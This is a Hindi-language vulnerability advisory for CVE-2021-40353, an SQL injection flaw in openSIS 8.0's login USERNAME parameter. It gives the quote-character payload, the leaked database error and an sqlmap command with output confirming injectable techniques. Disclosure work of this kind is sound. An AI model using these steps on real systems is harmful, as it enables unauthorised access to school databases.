
CVE-2021-40353 openSIS 8.0 SQL Injection भेद्यता
CVE-2021-40353 openSIS 8.0 SQL इंजेक्शन भेद्यता https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353
MySQL या MariaDB को एप्लिकेशन डेटाबेस के रूप में उपयोग करने पर openSIS संस्करण 8.0 में SQL इंजेक्शन भेद्यता मौजूद है। हमलावर USERNAME पैरामीटर के माध्यम से SQL कमांड जारी कर सकता है।
असुरक्षित PHP पेज:
index.php - USERNAME पैरामीटर
असुरक्षित पेलोड ' - डेटाबेस जानकारी के साथ एक त्रुटि उत्पन्न करेगा " - त्रुटि उत्पन्न नहीं करता
त्रुटि
दिनांक:
08/31/2021 03:16:22
असफलता सूचना:
DB Execute Failed
SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') Traceback: C:\xampp\htdocs\opensis\index.php at 502 अतिरिक्त जानकारी: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''user1'')' at line 1 दिनांक:
08/31/2021 03:16:22
openSIS को एक त्रुटि का सामना करना पड़ा है जो निम्नलिखित में से किसी के कारण हो सकती है:
अमान्य डेटा इनपुट
डेटाबेस SQL त्रुटि
प्रोग्राम त्रुटि
कृपया इस स्क्रीनशॉट को लें और डिबगिंग और समाधान के लिए अपने openSIS प्रतिनिधि को भेजें।
sqlmap -r post_opensis -p USERNAME
[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
खोजकर्ता: Brian Lowe, अगस्त 2021